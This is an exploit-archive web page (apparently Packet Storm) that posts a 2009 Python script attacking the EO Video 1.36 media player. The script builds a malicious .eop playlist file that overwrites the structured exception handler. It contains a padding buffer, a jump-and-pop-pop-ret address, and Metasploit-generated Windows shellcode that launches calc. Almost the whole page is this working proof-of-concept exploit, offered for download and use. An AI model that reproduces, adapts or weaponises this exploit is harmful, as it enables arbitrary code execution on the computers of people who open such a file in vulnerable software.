exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

EO Video 1.36 SEH Overwrite Exploit

EO Video 1.36 SEH Overwrite Exploit
Posted Mar 9, 2009
Authored by j0rgan, His0k4 | Site jorgan.users.cg.yu

EO Video version 1.36 playlist SEH overwrite exploit.

tags | exploit
SHA-256 | 2356a9f5ba08842575987b6b361a6aa9f1d8850ef09dc39e2a5403df3eac97e5

EO Video 1.36 SEH Overwrite Exploit

Change Mirror Download
#!/usr/bin/python
#usage: exploit.py
print "**************************************************************************"
print "[*] EO Video v1.36 PlayList Seh Overwrite Exploit\n"
print "[*] Author: j0rgan"
print "[*] Seh Exploitation : His0k4"
print "[*] Tested on: Windows XP SP2 (Fr)\n"
print "[*] Greetings to: All friends & Muslims HacKerS (DZ)"
print "**************************************************************************"

buff = "\x41" * 1356

next_seh = "\xEB\x06\x41\x41"

seh = "\x14\x1E\x5B\x58" #pop pop ret msgsm32 .acm

header1= (
"\x3C\x45\x4F\x50\x6C\x61\x79\x6C\x69\x73\x74\x3E\x0A\x3C\x50\x6C\x61\x79\x6C"
"\x69\x73\x74\x3E\x0A\x3C\x46\x6F\x6C\x64\x65\x72\x4C\x69\x73\x74\x3E\x0A\x3C"
"\x46\x6F\x6C\x64\x65\x72\x3E\x0A\x3C\x4E\x61\x6D\x65\x3E\x6E\x65\x73\x74\x6F"
"\x3C\x2F\x4E\x61\x6D\x65\x3E\x0A\x3C\x54\x72\x75\x65\x46\x72\x65\x71\x75\x65"
"\x6E\x63\x79\x3E\x31\x3C\x2F\x54\x72\x75\x65\x46\x72\x65\x71\x75\x65\x6E\x63"
"\x79\x3E\x0A\x3C\x2F\x46\x6F\x6C\x64\x65\x72\x3E\x0A\x3C\x46\x6F\x6C\x64\x65"
"\x72\x3E\x0A\x3C\x4E\x61\x6D\x65\x3E\x6E\x65\x73\x74\x6F\x3C\x2F\x4E\x61\x6D"
"\x65\x3E\x0A\x3C\x54\x72\x75\x65\x46\x72\x65\x71\x75\x65\x6E\x63\x79\x3E\x31"
"\x3C\x2F\x54\x72\x75\x65\x46\x72\x65\x71\x75\x65\x6E\x63\x79\x3E\x0A\x3C\x2F"
"\x46\x6F\x6C\x64\x65\x72\x3E\x0A\x3C\x2F\x46\x6F\x6C\x64\x65\x72\x4C\x69\x73"
"\x74\x3E\x0A\x3C\x50\x72\x6F\x6A\x65\x63\x74\x45\x6C\x65\x6D\x65\x6E\x74\x3E"
"\x0A\x3C\x4E\x61\x6D\x65\x3E")

header2= (
"\x3C\x2F\x4E\x61\x6D\x65\x3E\x0A\x3C\x53\x74\x61\x72\x74\x54\x69\x6D\x65\x3E"
"\x30\x3C\x2F\x53\x74\x61\x72\x74\x54\x69\x6D\x65\x3E\x0A\x3C\x45\x6E\x64\x54"
"\x69\x6D\x65\x3E\x30\x3C\x2F\x45\x6E\x64\x54\x69\x6D\x65\x3E\x0A\x3C\x4D\x65"
"\x64\x69\x61\x53\x69\x7A\x65\x3E\x0A\x3C\x57\x69\x64\x74\x68\x3E\x2D\x31\x3C"
"\x2F\x57\x69\x64\x74\x68\x3E\x0A\x3C\x48\x65\x69\x67\x68\x74\x3E\x2D\x31\x3C"
"\x2F\x48\x65\x69\x67\x68\x74\x3E\x0A\x3C\x2F\x4D\x65\x64\x69\x61\x53\x69\x7A"
"\x65\x3E\x0A\x3C\x53\x74\x61\x74\x65\x3E\x33\x30\x32\x31\x36\x3C\x2F\x53\x74"
"\x61\x74\x65\x3E\x0A\x3C\x46\x6F\x6C\x64\x65\x72\x50\x6F\x73\x69\x74\x69\x6F"
"\x6E\x49\x6E\x64\x65\x78\x3E\x30\x3C\x2F\x46\x6F\x6C\x64\x65\x72\x50\x6F\x73"
"\x69\x74\x69\x6F\x6E\x49\x6E\x64\x65\x78\x3E\x0A\x3C\x2F\x50\x72\x6F\x6A\x65"
"\x63\x74\x45\x6C\x65\x6D\x65\x6E\x74\x3E\x0A\x3C\x2F\x50\x6C\x61\x79\x6C\x69"
"\x73\x74\x3E\x5C\x6E\x3C\x2F\x45\x4F\x50\x6C\x61\x79\x6C\x69\x73\x74\x3E")


# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x35"
"\x9c\xf7\xbc\x83\xeb\xfc\xe2\xf4\xc9\x74\xb3\xbc\x35\x9c\x7c\xf9"
"\x09\x17\x8b\xb9\x4d\x9d\x18\x37\x7a\x84\x7c\xe3\x15\x9d\x1c\xf5"
"\xbe\xa8\x7c\xbd\xdb\xad\x37\x25\x99\x18\x37\xc8\x32\x5d\x3d\xb1"
"\x34\x5e\x1c\x48\x0e\xc8\xd3\xb8\x40\x79\x7c\xe3\x11\x9d\x1c\xda"
"\xbe\x90\xbc\x37\x6a\x80\xf6\x57\xbe\x80\x7c\xbd\xde\x15\xab\x98"
"\x31\x5f\xc6\x7c\x51\x17\xb7\x8c\xb0\x5c\x8f\xb0\xbe\xdc\xfb\x37"
"\x45\x80\x5a\x37\x5d\x94\x1c\xb5\xbe\x1c\x47\xbc\x35\x9c\x7c\xd4"
"\x09\xc3\xc6\x4a\x55\xca\x7e\x44\xb6\x5c\x8c\xec\x5d\x6c\x7d\xb8"
"\x6a\xf4\x6f\x42\xbf\x92\xa0\x43\xd2\xff\x96\xd0\x56\x9c\xf7\xbc"
)

exploit = header1 + buff + next_seh + seh + shellcode + header2

try:
out_file = open("exploit.eop",'w')
out_file.write(exploit)
out_file.close()
print "Exploit File Created!\nNow Open it :)"
except:
print "Error"


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close